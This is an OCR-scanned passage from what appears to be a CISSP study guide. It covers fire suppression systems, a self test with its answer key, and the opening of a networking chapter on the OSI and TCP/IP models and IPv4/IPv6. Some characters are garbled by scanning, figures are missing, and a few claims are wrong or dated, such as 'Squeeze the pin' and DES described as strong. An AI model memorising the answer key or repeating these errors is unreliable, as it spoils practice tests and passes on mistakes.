izing the extinguisher). 

In addition to suppressing fire by lowering temperature, soda acid also has 
additional suppressive properties beyond plain water: it creates foam that can float 
on the surface of some liquid fires, starving the oxygen supply. 

Dry Powder 

Extinguishing a fire with dry powder (such as sodium chloride) works by lowering 
temperature and smothering the fire, starving it of oxygen. Dry powder is primarily 
used to extinguish metal fires. Flammable metals include sodium, magnesium, and 
many others. 

Wet Chemical 

Wet chemicals are primarily used to extinguish kitchen fires (type K fires in the U.S.; 
type F in Europe), but may also be used on common combustible fires (type A). The 
chemical is usually potassium acetate mixed with water. This covers a grease or oil 
fire in a soapy film that lowers the temperature. 

co 2 

C0 2 , oxygen, and nitrogen are what we breathe as air. Fires require oxygen as fuel, 
so removing oxygen smothers fires: this is how C0 2 fire suppression works. 

A risk associated with CO, is it is odorless and colorless, and our bodies will 
breathe it as air. By the time we begin suffocating due to lack of oxygen, it is often 
too late. This makes CO, a dangerous suppressive agent, which is only recom- 
mended in unstaffed areas such as electrical substations. Any personnel entering a 
C0 2 -protected area should be trained for CO, safety; additional safety controls (such 
as oxygen tanks) are usually recommended. 


EXAM WARNING 


All environmental controls and safety procedures must ensure the safety of all personnel, including 
those with handicaps. Elevators cannot be used during a fire, for example, so employees in 
wheelchairs must have a compensating control. 
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Halon and Halon Substitutes 

Halon extinguishes fire via a chemical reaction that consumes energy and lowers the 
temperature of the fire. Halon is being phased out, and a number of replacements 
with similar properties are now used. 


NOTE 

The chemical effect of Halon and Halon substitutes is often misunderstood: many believe they 
work like C0 2 and extinguish fire via oxygen starvation. While this is a secondary effect of Halon, 
this effect is comparatively minor: these systems are designed to allow enough oxygen to support 
human life. 


Montreal Accord 

Halon has ozone-depleting properties. Due to this effect, the 1989 Montreal Protocol 
(formally called the “Montreal Protocol on Substances That Deplete the Ozone Lay- 
er”) banned production and consumption of new Halon in developed countries by 
January 1, 1994. Existing Halon systems may be used. While new Halon is not being 
produced, recycled Halon may be used. There are exceptions for certain critical uses, 
such as airplanes and submarines. See http://ozone.unep.org for more information on 
the Montreal Protocol. 

As a practical matter, Halon systems are no longer recommended due to their 
age. Any existing Halon system is probably over 20 years old and is likely due to be 
replaced due to sheer age. One option for replacement are similar systems such as 
argon, FM-200, etc. 

Halon Replacements 

Recommended replacements for Halon include the following systems: 

• Argon 

• FE-13 

• FM-200 

• Inergen 

FE-13 is the newest of these agents, and comparatively safe. It may be breathed 
in concentrations of up to 30%. Other Halon replacements are typically only safe up 
to 10-15% concentration. 

Count- Down Timers 

CO,. Halon, and Halon substitutes such as FM-200 are considered gas-based systems. 
All gas systems should use a countdown timer (both visible and audible) before gas is 
released. This is primarily for safety reasons, to allow personnel evacuation before re- 
lease. A secondary effect is to allow personnel to stop the release in case of false alarm. 

C0 2 cannot be breathed in high quantities and is deadly. While Halon and Halon 
replacements are designed to be breathed in normal concentrations, they are still 
more dangerous than water (minus electricity). 
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NOTE 

Water is usually the recommended fire suppression agent. Water (in the absence of electricity) is the 
safest suppression agent for people. 


Sprinkler Systems 

All sprinkler systems should be combined with a fire alarm that alerts people to evac- 
uate the premises in case of fire. Safe evacuation is the primary goal of fire safety. 

Wet Pipe 

Wet pipes have water right up to the sprinkler heads: the pipes are “wet.” The sprin- 
kler head contains a metal (common in older sprinklers) or small glass bulb designed 
to melt or break at a specific temperature. Once that occurs, the sprinkler head opens 
and water flows. Each head will open independently as the trigger temperature is 
exceeded. Figure 4.43 shows a bulb type sprinkler head. 

The bulbs come in different colors, which indicate the ceiling temperature that 
will trigger the bulb to burst and open the sprinkler head. The colors used are orange 
(135°F/57°C), red (155°F/68°C), yellow (175°F/79°C), green (200°F/93°C), and 
blue (286°F/141°C). NFPA 13: Standard for the Installation of Sprinkler Systems 
describes the color conventions used for these sprinkler heads. See: http://www.nfpa. 
org / aboutthecodes/AboutTheCodes . asp?DocNum= 1 3 . 

Dry Pipe 

Dry pipe systems also have closed sprinkler heads: the difference is the pipes are 
filled with compressed air. The water is held back by a valve that remains closed as 



FIGURE 4.43 Bulb Sprinkler Head 
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long as sufficient air pressure remains in the pipes. As the dry pipe sprinkler heads 
open, the air pressure drops in each pipe, allowing the valve to open and send water 
to that head. 

Dry pipes are often used in areas where water may freeze, such as parking 
garages. 

Deluge 

Deluge systems are similar to dry pipes, except the sprinkler heads are open and 
larger than dry pipe heads. The pipes are empty at normal air pressure; a deluge valve 
holds the water back. The valve is opened when a fire alarm (that may monitor smoke 
or flame sensors) triggers. 

Pre-Action 

Pre-action systems are a combination of wet, dry, or deluge systems, and require 
two separate triggers to release water. Single interlock systems release water into 
the pipes when a fire alarm triggers. The water releases once the head opens. Double 
interlock systems use compressed air (same as dry pipes): the water will not fill the 
pipes until both the fire alarm triggers and the sprinkler head opens. 

Pre-action systems are used in areas such as museums, where accidental dis- 
charge would be expensive. Double-interlock systems are used in cold areas such as 
freezers to avoid frozen pipes. 

Portable Fire Extinguishers 

All portable fire extinguishers should be marked with the type of fire they are 
designed to extinguish. 

Portable extinguishers should be small enough to be operated by any personnel 
who may need to use one. This means those old brass monster extinguishers are not 
a recommended control. 

Use the “PASS” method to extinguish a fire with a portable fire extinguisher: 

• Pull the pin 

• Aim low 

• Squeeze the pin 

• Sweep the fire 


SUMMARY OF EXAM OBJECTIVES 

In this (large) domain we began by describing fundamental logical hardware, operat- 
ing system, and software security components, and how to use those components to 
design, architect, and evaluate secure computer systems. Understanding these funda- 
mental issues is critical for an information security professional. 

We then moved on to cryptography, which dates to ancient times, but is very 
much a part of our modern world, providing security for data in motion and at rest. 
Modern systems such as Public Key Infrastructure put all the cryptographic pieces 
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into play via the use of symmetric, asymmetric, and hash-based encryption to pro- 
vide confidentiality, integrity, authentication, and nonrepudiation. You have learned 
how the pieces fit together: slower and weaker asymmetric ciphers such as RSA and 
Diffie-Hellman are used to exchange faster and stronger symmetric keys such as 
AES and DES. The symmetric keys are used as session keys to encrypt short-term 
sessions, such as Web connections via HTTPS. Digital signatures employ public key 
encryption and hash algorithms such as MD5 and SHA- 1 to provide nonrepudiation, 
authentication of the sender, and integrity of the message. Understanding these con- 
cepts and others discussed in this chapter and applying them together is critical for 
success on the exam. 

Finally, physical security is implicit in most other security controls and is often 
overlooked. We must always seek balance when implementing controls from all 8 
domains of knowledge. All assets should be protected by multiple defense-in-depth 
controls that span multiple domains. For example, a file server can be protected by 
policy, procedures, access control, patching, antivirus, OS hardening, locks, walls, 
HVAC, and fire suppression systems (among other controls). A thorough and accu- 
rate risk assessment should be conducted for all assets that must be protected. Take 
care to ensure no domains or controls are overlooked or neglected. 


SELF TEST 


NOTE 

Please see the Self Test Appendix for explanations of all correct and incorrect answers. 


1 . What type of sprinkler system would be best for an art gallery? 

A. Wet pipe 

B. Dry pipe 

C. Deluge 

D. Pre-action 

2. What is the primary drawback in using dogs as a perimeter control? 

A. Training 

B. Cost 

C. Liability 

D. Appearance 

3. The RSA algorithm is based on which one-way function? 

A. Elliptic curves 

B. Discrete logarithm 

C. Frequency distribution 

D. Factoring composite numbers into their primes 
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4 . Which of the following is true for digital signatures? 

A. The sender encrypts the hash with a public key 

B. The sender encrypts the hash with a private key 

C. The sender encrypts the plaintext with a public key 

D. The sender encrypts the plaintext with a private key 

5 . Which algorithm should you use for a low-power device that must employ 
digital signatures? 

A. AES 

B. RSA 

C. ECC 

D. ElGamal 

6 . What model should you use if you are primarily concerned with confidentiality 
of information? 

A. Brewer-Nash 

B. Bell-LaPadula 

C. Biba 

D. Clark-Wilson 

7 . On Intel X86 systems, the kernel normally runs in which CPU ring? 

A. Ring 0 

B. Ring 1 

C. Ring 2 

D. Ring 3 

8. Which type of cloud service level would Linux hosting be offered under? 

A. IaaS 

B. IDaaS 

C. PaaS 

D. SaaS 

9 . You are surfing the Web via a wireless network. Your wireless connection 
becomes unreliable, so you plug into a wired network to continue surfing. 
While you changed physical networks, your browser required no change. 

What security feature allows this? 

A. Abstraction 

B. Hardware Segmentation 

C. Layering 

D. Process Isolation 

1 0. A criminal deduces that an organization is holding an offsite meeting and has 
few people in the building, based on the low traffic volume to and from the 
parking lot, and uses the opportunity to break into the building to steal laptops. 
What type of attack has been launched? 

A. Aggregation 

B. Emanations 

C. Inference 

D. Maintenance Hook 
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1 1 . EMI issues such as crosstalk primarily impact which aspect of security? 

A. Confidentiality 

B. Integrity 

C. Availability 

D. Authentication 

1 2. What is the most important goal of fire suppression systems? 

A. Preservation of critical data 

B. Safety of personnel 

C. Building integrity 

D. Quickly extinguishing a fire 

1 3. What type of network cable should be used to eliminate the chance of 
crosstalk? 

A. Shielded twisted pair 

B. Unshielded twisted pair 

C. Coaxial 

D. Fiber optic 

1 4. Nonrepudiation is best described as what? 

A. Proving a user performed a transaction 

B. Proving a transaction did not change 

C. Authenticating a transaction 

D. Proving a user performed a transaction that did not change 

1 5. Hotspot: you receive the following signed email from Roy Batty. You 
determine that the email is not authentic, or has changed since it was sent. 
Click on the locally-generated message digest that proves the email lacks non- 
repudiation. 



e24a73bd98 
0e71af 7c8b 
6d4e48da04 
40 6d6c8e8f 


6e2903d23a 
b37a9a4872 
225a588c21 
d2d!0f 1135 


Compare ' 

w the hashes > 


FIGURE 4.44 Hotspot 


SELF TEST QUICK ANSWER KEY 

1. D 

2. C 

3. D 

4. B 

5. C 
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6. B 

7. A 

8. A 

9. C 

10. C 

11. B 

12. B 

13. D 

14. D 

15 . 



FIGURE 4.45 Hotspot Answer 
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CHAPTER 


Domain 4: Communication 
and Network Security 
(Designing and Protecting 
Network Security) 



EXAM OBJECTIVES IN THIS CHAPTER 

• Network Architecture and Design 

• Secure Network Devices and Protocols 

• Secure Communications 


UNIQUE TERMS AND DEFINITIONS 

• The OSI model — a network model with seven layers: physical, data link, 
network, transport, session, presentation, and application 

• The TCP/IP model — a simpler network model with four layers: network access, 
Internet, transport, and application 

• Packet-switched network — a form of networking where bandwidth is shared and 
data is carried in units called packets 

• Switch — a layer 2 device that carries traffic on one LAN, based on MAC addresses 

• Router — a layer 3 device that routes traffic from one LAN to another, based on 
IP addresses 

• Packet Filter and Stateful Firewalls — devices that filter traffic based on OSI 
layers 3 (IP addresses) and 4 (ports) 

• Carrier Sense Multiple Access ( CSMA ) — a method used by Ethernet networks 
to allow shared usage of a baseband (one-channel) network and avoid collisions 
(multiple interfering signals) 


INTRODUCTION 

Communications and Network Security are fundamental to our modern life. The In- 
ternet, the World Wide Web, online banking, instant messaging email, and many 
other technologies rely on network security: our modern world cannot exist without 
it. Communications and Network Security focuses on the confidentiality, integrity 
and availability of data in motion. 
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Communications and Network Security is one of the largest domains in the Com- 
mon Body of Knowledge, and contains more concepts than any other domain. This 
domain is also one of the most technically deep domains, requiring technical knowl- 
edge down to packets, segments, frames , and their headers. Understanding this 
domain is critical to ensure success on the exam. 


NETWORK ARCHITECTURE AND DESIGN 

Our first section is network architecture and design. We will discuss how networks 
should be designed and the controls they may contain, focusing on deploying 
defense-in-depth strategies, and weighing the cost and complexity of a network 
control versus the benefit provided. 

NETWORK DEFENSE-IN-DEPTH 

Communications and Network Security employs defense-in-depth, as we do in all 8 
domains of the common body of knowledge. Any one control may fail, so multiple 
controls are always recommended. Before malware (malicious software) can reach 
a server, it may be analyzed by: routers, firewalls, intrusion detection systems, and 
host-based protections such as antivirus software. Hosts are patched, and users have 
been provided with awareness of malware risks. The failure of any one of these con- 
trols should not lead to compromise. 

No single concept described in this chapter (or any other) provides sufficient 
defense against possible attacks: these concepts should be used in concert. 

FUNDAMENTAL NETWORK CONCEPTS 

Before we can discuss specific Communications and Network Security concepts, we 
need to understand the fundamental concepts behind them. Terms like “ broadband ” 
are often used informally: the exam requires a precise understanding of information 
security terminology. 

Simplex, Half Duplex and Full Duplex Communication 

Simplex communication is one-way, like a car radio tuned to a music station. Half- 
duplex communication sends or receives at one time only (not simultaneously), like 
a walkie-talkie. Full-duplex communications send and receive simultaneously, like 
two people having a face-to-face conversation. 

Baseband and Broadband 

Baseband networks have one channel, and can only send one signal at a time. Ether- 
net networks are baseband: a “lOObaseT” UTP cable means 100 megabit, baseband, 
and twisted pair. Broadband networks have multiple channels and can send multiple 
signals at a time, like cable TV. The term “channel” derives from communications 
like radio. 
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Analog & Digital 

Analog communications are what our ears hear, a continuous wave of information. 
The original phone networks were analog networks, designed to carry the human 
voice. Digital communications transfer data in bits: ones and zeroes. A vinyl record 
is analog; a compact disc is digital. 

LANS, WANS, MANS, GANS and PANS 

A LAN is a Local Area Network. A LAN is a comparatively small network, typically 
confined to a building or an area within one. A MAN is a Metropolitan Area Network, 
which is typically confined to a city, a zip code, a campus, or office park. A WAN is a 
Wide Area Network, typically covering cities, states, or countries. A GAN is a Global 
Area Network, a global collection of WANs. 

The Global Information Grid (GIG) is the U.S. Department of Defense (DoD) 
global network, one of the largest private networks in the world. 

At the other end of the spectrum, the smallest of these networks are PANs: Per- 
sonal Area Networks, with a range of 100 meters or much less. Low-power wireless 
technologies such as Bluetooth use PANs. 


EXAM WARNING 


The exam is simpler and more clear-cut than the real world. There are real-world exceptions to 
statements like “A LAN is typically confined to a building or area within one.” The exam will 
be more clear-cut, as will this book. If you read examples given in this book, and think “that’s 
usually true, but a bit simplistic,” then you are correct. That simplicity is by design, to help you 
pass the exam. 


Internet, Intranet and Extranet 

The Internet is a global collection of peered networks running TCP/IP, providing 
best effort service. An Intranet is a privately owned network running TCP/IP, such as 
a company network. An Extranet is a connection between private Intranets, such as 
connections to business partner Intranets. 

Circuit-Switched and Packet-Switched Networks 

The original voice networks were circuit-switched: a dedicated circuit or channel 
(portion of a circuit) was dedicated between two nodes. Circuit-switched networks 
can provide dedicated bandwidth to point-to-point connections, such as a T1 con- 
necting two offices. 

One drawback of circuit-switched networks: once a channel or circuit is con- 
nected, it is dedicated to that purpose, even while no data is being transferred. Packet- 
switched networks were designed to address this issue, as well as handle network 
failures more robustly. 

The original research on packet- switched networks was conducted in the early 
1960s on behalf of the Defense Advanced Research Projects Agency (DARPA). 
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That research led to the creation of the ARPAnet, the predecessor of the Internet. 
For more information, see the Internet Society’s “A Brief History of the Internet,” 
at http://www.internetsociety.org/internet/internet-51/history-internet/brief-history- 
internet. 

Early packet-switched network research by the RAND Corporation described a 
“nuclear” scenario, but reports that the ARPAnet was designed to survive a nuclear 
war are not true. The Internet Society’s History of the Internet reports “...work on 
Internetting did emphasize robustness and survivability, including the capability to 
withstand losses of large portions of the underlying networks.”[l] 

Instead of using dedicated circuits, data is broken into packets, each sent indi- 
vidually. If multiple routes are available between two points on a network, packet 
switching can choose the best route, and fall back to secondary routes in case of 
failure. Packets may take any path (and different paths) across a network, and are 
then reassembled by the receiving node. Missing packets can be retransmitted, and 
out of-order packets can be re-sequenced. 

Unlike circuit-switched networks, packet-switched networks make unused band- 
width available for other connections. This can give packet-switched networks a cost 
advantage over circuit-switched. 

Quality of Service 

Making unused bandwidth available for other applications presents a challenge: 
what happens when all bandwidth is consumed? Which applications “win” (receive 
required bandwidth)? This is not an issue with circuit- switched networks, where 
applications have exclusive access to dedicated circuits or channels. 

Packet switched networks may use Quality of Service (QoS) to give specific traf- 
fic precedence over other traffic. For example: QoS is often applied to Voice over 
IP (VoIP) traffic (voice via packet-switched data networks), to avoid interruption of 
phone calls. Less time-sensitive traffic, such as SMTP (Simple Mail Transfer Pro- 
tocol, a store-and-forward protocol used to exchange email between servers), often 
receives a lower priority. Small delays exchanging emails are less likely to be noticed 
compared to dropped phone calls. 


Layered Design 

Network models such as OSI and TCP/IP are designed in layers. Each layer performs 
a specific function, and the complexity of that functionality is contained within its 
layer. Changes in one layer do not directly affect another: changing your physical 
network connection from wired to wireless (at Layer 1, as described below) has no 
effect on your Web browser (at Layer 7), for example. 


Models and Stacks 

A network model is a description of how a network protocol suite operates, such as 
the OSI Model or TCP/IP Model. A network stack is a network protocol suite pro- 
grammed in software or hardware. For example, the TCP/IP Model describes TCP/ 
IP, and your laptop runs the TCP/IP stack. 
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Table 5.1 The OSI Model 
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THE OSI MODEL 

The OSI (Open System Interconnection) Reference Model is a layered network model. 
The model is abstract: we do not directly run the OSI model in our systems (most 
now use the TCP/IP model); it is used as a reference point, so “Layer 1” (physical) 
is universally understood, whether you are running Ethernet or ATM, for example. 
“Layer X” in this book refers to the OSI model. 

The OSI model has seven layers, as shown in Table 5.1. The layers may be listed 
in top-to-bottom or bottom- to-top order. Using the latter, they are Physical, Data 
Link, Network, Transport, Session, Presentation, and Application. 


NOTE 

The OSI model was developed by the International Organization for Standardization (ISO), so some 
sources confusingly call it the ISO model, or even the ISO OSI model. The model is formally called 
“X.200: Information technology — Open Systems Interconnection — Basic Reference Model.” 

The X.200 recommendation may be downloaded for free at: http://www.itu.int/rec/T-REC-X.200- 
199407-I/en. The term “OSI model” is the most prevalent, so that is the term used in this book. 


Layer 1 - Physical 

The physical layer is layer 1 of the OSI model. Layer 1 describes units of data such as 
bits represented by energy (such as light, electricity, or radio waves) and the medium 
used to carry them (such as copper or fiber optic cables). WLANs have a physical 
layer, even though we cannot physically touch it. 

Cabling standards such as Thinnet, Thicknet, and Unshielded Twisted Pair (UTP) 
exist at layer 1, among many others. Layer 1 devices include hubs and repeaters. 

Layer 2 - Data Link 

The Data Link Layer handles access to the physical layer as well as local area net- 
work communication. An Ethernet card and its MAC (Media Access Control) address 
are at Layer 2, as are switches and bridges. 

Layer 2 is divided into two sub-layers: Media Access Control (MAC) and Logi- 
cal Link Control (LLC). The MAC layer transfers data to and from the physical 
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layer. LLC handles LAN communications. MAC touches Layer 1, and LLC touches 
Layer 3. 

Layer 3 - Network 

The Network layer describes routing: moving data from a system on one LAN to 
a system on another. IP addresses and routers exist at Layer 3. Layer 3 protocols 
include IPv4 and IPv6, among others. 

Layer 4 - Transport 

The Transport layer handles packet sequencing, flow control, and error detection. 
TCP and UDP are Layer 4 protocols. 

Layer 4 makes a number of features available, such as resending or re-sequencing 
packets. Taking advantage of these features is a protocol implementation decision. As 
we will see later, TCP takes advantage of these features, at the expense of speed. Many 
of these features are not implemented in UDP, which chooses speed over reliability. 

Layer 5 - Session 

The Session Layer manages sessions, which provide maintenance on connections. 
Mounting a file share via a network requires a number of maintenance sessions, such 
as Remote Procedure Calls (RPCs); these exist at the session layer. A good way to 
remember the session layer’s function is “connections between applications.” The 
Session Layer uses simplex, half-duplex, and full-duplex communication. 


NOTE 

The transport and session layers are often confused. For example, is “maintenance of connections” 
a transport layer or session layer issue? Packets are sequenced at the transport layer, and network 
file shares can be remounted at the session layer: you may consider either to be maintenance. Words 
like “maintenance” imply more work than packet sequencing or retransmission: it requires “heavier 
lifting,” like remounting a network share that has been un-mounted, so session layer is the best answer. 


Layer 6 - Presentation 

The Presentation Layer presents data to the application (and user) in a comprehensi- 
ble way. Presentation Layer concepts include data conversion, character sets such as 
ASCII, and image formats such as GIF (Graphics Interchange Format), JPEG (Joint 
Photographic Experts Group), and TIFF (Tagged Image File Format). 

Layer 7 - Application 

The Application Layer is where you interface with your computer application. Your 
Web browser, word processor, and instant messaging client exist at Layer 7. The 
protocols Telnet and FTP are Application Layer protocols. 


NOTE 

Many mnemonics exist to help remember the OSI model. From bottom to top, “Please Do Not 
Throw Sausage Pizza Away” (Physical Data-Link Network Transport Session Presentation 
Application) is a bit silly, but that makes it more memorable. Also silly: “Please Do Not Tell Sales 
People Anything.” From top to bottom, “All People Seem To Need Data Processing” is also popular. 
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Table 5.2 The OSI Model vs. TCP/IP Model 


OSI Model 


TCP/IP Model 


7 

Application 

6 

Presentation 

5 

Session 

4 

Transport 

3 

Network 

2 

Data Link 

1 

Physical 


Application 


Host-to-Host 

Transport 


Internet 


Network 

Access 


THE TCP/IP MODEL 

The TCP/IP model (Transmission Control Protocol/Internet Protocol) is a popular 
network model created by DARPA in the 1970s (see: http://www.internetsociety. 
org/internet/internet-51/history-internet/brief-history-internet for more information). 
TCP/IP is an informal name (named after the first two protocols created); the for- 
mal name is the Internet Protocol Suite. The TCP/IP model is simpler than the OSI 
model, as shown in Table 5.2. 

While TCP and IP receive top billing, TCP/IP is actually a suite of protocols 
including UDP (User Datagram Protocol) and ICMP (Internet Control Message Pro- 
tocol), among many others. 


NOTE 

The names and number of the TCP layers is a subject of much debate, with many “authoritative” 
sources disagreeing with each other. Confusingly, some sources use Link Layer in place of Network 
Access Layer, and Network layer in place of Internet Layer. This book follows the conventions 
described in TCP/IP references listed in the exam’s 2009 Candidate Information Bulletin, such as 
Cisco TCP/IP Routing Professional Reference (McGraw-Hill) by Chris Lewis. 


Network Access Layer 

The Network Access Layer of the TCP/IP model combines layers 1 (Physical) and 
2 (Data Link) of the OSI model. It describes Layer 1 issues such as energy, bits, and 
the medium used to carry them (copper, fiber, wireless, etc.). It also describes Layer 
2 issues such as converting bits into protocol units such as Ethernet frames, MAC 
(Media Access Control) addresses, and Network Interface Cards (NICs). 

Internet Layer 

The Internet Layer of the TCP/IP model aligns with the Layer 3 (Network) layer of 
the OSI model. This is where IP addresses and routing live. When data is transmitted 
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from a node on one LAN to a node on a different LAN, the Internet Layer is used. 
IPv4, IPv6, ICMP, and routing protocols (among others) are Internet Layer TCP/IP 
protocols. 


EXAM WARNING 


Layer 3 of the OSI model is called “Network.” Do not confuse OSI’s layer 3 with the “Network 
Access” TCP/IP layer, which aligns with layers 1 and 2 of the OSI model. 


Host-to-Host Transport Layer 

The Host-to-Host Transport Layer (sometimes called either “Host-to-Host” or, more 
commonly, “Transport” alone; this book will use “Transport”) connects the Internet 
Layer to the Application Layer. It is where applications are addressed on a network, 
via ports. TCP and UDP are the two Transport Layer protocols of TCP/IP. 

Application Layer 

The TCP/IP Application Layer combines Layers 5 through 7 (Session, Presentation, 
and Application) of the OSI model. Most of these protocols use a client-server archi- 
tecture, where a client (such as ssh ) connects to a listening server (called a daemon 
on UNIX systems) such as sshd. The clients and servers use either TCP or UDP (and 
sometimes both) as a Transport Layer protocol. TCP/IP Application Layer protocols 
include SSH, Telnet and FTP, among many others. 

ENCAPSULATION 

Encapsulation takes information from a higher layer and adds a header to it, treat- 
ing the higher layer information as data. It is often said, “One layer’s header is 
another layer’s data.”[2] For example, as the data moves down the stack, applica- 
tion layer data is encapsulated in a layer 4 TCP segment. That TCP segment is 
encapsulated in a Layer 3 IP packet. That IP packet is encapsulated in a Layer 2 
Ethernet frame. The frame is then converted into bits at Layer 1 and sent across the 
local network. Data, segments, packets, frames, and bits are examples of Protocol 
Data Units (PDUs). 


NOTE 

The mnemonic “SPF10” is helpful for remembering PDUs: Segments, Packets, Frames, Ones and 
Zeroes. 


The reverse of encapsulation is called de-multiplexing (sometimes called de- 
encapsulation). As the PDUs move up the stack, bits are converted to Ethernet 
frames, frames are converted to IP packets, packets are converted to TCP segments, 
and segments are converted to application data. 
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NETWORK ACCESS, INTERNET AND TRANSPORT LAYER 
PROTOCOLS AND CONCEPTS 

TCP/IP is a protocol suite: including (but not limited to): IPv4 and IPv6 at the Internet 
layer; TCP and UDP at the Transport layer; and a multitude of higher-level protocols, 
including Telnet, FTP, SSH, and many others. Let us focus on the lower layer proto- 
cols, spanning from the Network Access to Transport layers. Some protocols, such 
as IP, fit neatly into one layer (Internet). Others, such as Address Resolution Protocol 
(ARP), help connect one layer to another (Network Access to Internet in ARP’s case). 

MAC Addresses 

A Media Access Control (MAC) address is the unique hardware address of an 
Ethernet network interface card (NIC), typically “burned in” at the factory. MAC 
addresses may be changed in software. 


NOTE 

Burned-in MAC addresses should be unique. There are real-world exceptions to this, often due to 
mistakes by NIC manufacturers, but hardware MAC addresses are considered unique on the exam. 


Historically, MAC addresses were 48 bits long. They have two halves: the first 
24 bits form the Organizationally Unique Identifier (OUI) and the last 24 bits form a 
serial number (formally called an extension identifier). 

Organizations that manufacture NICs, such as Cisco, Juniper, HP, IBM, and many 
others, purchase 24-bit OUIs from the Institute of Electrical and Electronics Engi- 
neers (IEEE), Incorporated Registration Authority. A List of registered OUIs is avail- 
able at http://standards.ieee.org/regauth/oui/oui.txt 

Juniper owns OUI 00-05-85, for example. Any NIC with a MAC address that 
begins with 00:05:85 is a Juniper NIC. Juniper can then assign MAC addresses based 
on their OUI: the first would have been MAC address 00:05:85:00:00:00, the second 
00:05:85:00:00:01, the third 00:05:85:00:00:02, etc. This process continues until the 
serial numbers for that OUI have been exhausted. Then a new OUI is needed. 

EUI-64 MAC addresses 

The IEEE created the EUI-64 (Extended Unique Identifier) standard for 64-bit MAC 
addresses. The OUI is still 24 bits, but the serial number is 40 bits. This allows for 
far more MAC addresses, compared with 48-bit addresses. IPv6 autoconfiguration is 
compatible with both types of MAC addresses. 

IPv4 

IPv4 is Internet Protocol version 4, commonly called "IP.” It is the fundamental pro- 
tocol of the Internet, designed in the 1970s to support packet- switched networking 
for the United States Defense Advanced Research Projects Agency (DARPA). IPv4 
was used for the ARPAnet, which later became the Internet. 
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0 12 3 

01234567890123456789012345678901 

| Version | IHL | Type of Service | Total Length | 

| Identification | Flags | Fragment Offset | 

I Time to Live | Protocol | Header Checksum | 

| Source Address | 

| Destination Address | 

| Options | Padding | 

FIGURE 5.1 IPv4 Packet [3] 


IP is a simple protocol, designed to carry data across networks. It is so simple that 
it requires a “helper protocol” called ICMP (see below). IP is connectionless and un- 
reliable: it provides “best effort” delivery of packets. If connections or reliability are 
required, they must be provided by a higher-level protocol carried by IP, such as TCP. 

IPv4 uses 32-bit source and destination addresses, usually shown in “dotted 
quad” format, such as “192.168.2.4.” A 32-bit address field allows 2 32 , or nearly 
4.3 billion, addresses. A lack of IPv4 addresses in a world where humans (and their 
devices) outnumber available IPv4 addresses is a fundamental problem: this was 
one of the factors leading to the creation of IPv6, which uses much larger 128-bit 
addresses. 

Key IPv4 Header Fields 

An IP header, shown in Figure 5.1, is 20 bytes long (with no options), and contains a 
number of fields. Key fields are: 

• Version: IP version (4 for IPv4) 

• IHL: Length of the IP header 

• Type of Service: originally used to set the precedence of the packet, but now 
used for Differentiated Services (DiffServ), a method for providing Quality of 
Service (QoS) 

• Identification, Flags, Offset: used for IP fragmentation 

• Time To Live: to end routing loops 

• Protocol: embedded protocol (protocol number representing TCP, UDP, etc.) 

• Source and Destination IP addresses 

• Optional: Options and padding 

IP Fragmentation 

If a packet exceeds the Maximum Transmission Unit (MTU) of a network, a router 
along the path may fragment it. An MTU is the maximum PDU size on a network. 
Fragmentation breaks a large packet into multiple smaller packets. A typical MTU 
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size for an IP packet is 1500 bytes. The IP Identification field (IPID) is used to re- 
associate fragmented packets (they will have the same IPID). The flags are used to 
determine if fragmentation is allowed, and whether more fragments are coming. The 
fragment offset gives the data offset the current fragment carries: “Copy this data 
beginning at offset 1480.” 

Path MTU discovery uses fragmentation to discover the largest size packet 
allowed across a network path. A large packet is sent with the DF (do not fragment) 
flag sent. A router with a smaller MTU than the packet size will seek to fragment, see 
that it cannot, and then drop it, sending a “Fragmentation needed and DF set” ICMP 
message. The sending node then sends increasingly smaller packets with the DF flag 
set, until they pass cleanly across the network path. 

IPv6 

IPv6 is the successor to IPv4, featuring far larger address space (128 bit addresses 
compared to IPv4’s 32 bits), simpler routing, and simpler address assignment. A lack 
of IPv4 addresses was the primary factor that led to the creation of IPv6. 

IPv6 has become more prevalent since the release of the Microsoft Vista operating 
systems, the first Microsoft client operating system to support IPv6 and have it 
enabled by default. All versions through Windows 10 have done the same. Other modem 
operating systems, such as OS X, Linux and Unix, also enable IPv6 by default. 


NOTE 

The IPv6 address space is 2 128 , which is big: really big. There are over 340 undecillion total IPv6 
addresses, which is a 39-digit number in decimal: 340,282,366, 920,938,463,463,374,607,431, 
768,21 1,456. IPv4 has just under 4.3 billion addresses, which is a 10-digit number in decimal: 
4,294,967,296. If all 4.3 billion IPv4 addresses together weighed 1 kilogram, all IPv6 addresses 
would weigh 79,228,162,514,264,337,593,543,950,336 kg, as much as 13,263 Planet Earths. 
Another useful comparison: if all IPv4 addresses fit into a golf ball, all IPv6 addresses would nearly 
fill the Sun. 


The IPv6 header, shown in Figure 5.2, is larger and simpler than IPv4. Fields 
include: 

• Version: IP version (6 for IPv6) 

• Traffic Class and Flow Label: used for QoS (Quality of Service) 

• Payload Length: length of IPv6 data (not including the IPv6 header) 

• Next header: next embedded protocol header 

• Hop Limit: to end routing loops 

IPv6 Addresses and Autoconfiguration 

IPv6 hosts can statelessly autoconfigure a unique IPv6 address, omitting the need 
for static addressing or DHCP. IPv6 stateless autoconfiguration takes the host’s 
MAC address and uses it to configure the IPv6 address. The ifconfig (interface 
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| Version | Traffic Class | Flow Label | 

| Payload Length | Next Header | Hop Limit | 

i i 

+ + 

i i 

+ Source Address + 

I I 

+ + 

I I 

I I 

+ + 

I I 

+ Destination Address + 

I I 

+ + 

I I 

FIGURE 5.2 IPv6 Header [4] 


configuration) output in Figure 5.3, shows the MAC address as hardware address 
(HWAddr) 00:0c:29:ef: 1 1 :36. 

IPv6 addresses are 128 bits long, and use colons instead of periods to delineate 
sections. One series of zeroes may be condensed into two colons The “ifcon- 

hg” output in Figure 5.3 shows two IPv6 addresses: 

• fcOl : :20c:29ff:feef: 1136/64 (Scope:Global) 

• fe80::20c:29ff:feef: 1 136/64 (Scope:Link) 

The first address (fcOl ::...) is a “global” (routable) address, used for communi- 
cation beyond the local network. IPv6 hosts rely on IPv6 routing advertisements to 
assign the global address. In Figure 5.3, a local router sent a route advertisement for 
the fcOl network, which the host used to configure its global address. 


root@ubuntu:~# ifconfig 


eth0 


Link encap: Ethernet 
inet addr: 192 .168.2. 


HWaddr 00:0c:29:ef : 11 : 36 

122 B£flsm2ZJ5E355I 


Mask : 255 . 255 .255.0 


inet6 addr: fc01: :20c :29ff:feef: 1136/64 Scope:Global 
inet6 addr: fe80: :20c: 29ff:feef: 1136/64 Scope:Link 
UP BROADCAST RUNNING MULTICAST MTU:1500 Metnc:l — 

RX packets: 17662 errors:© dropped:© overruns:© frame:© 
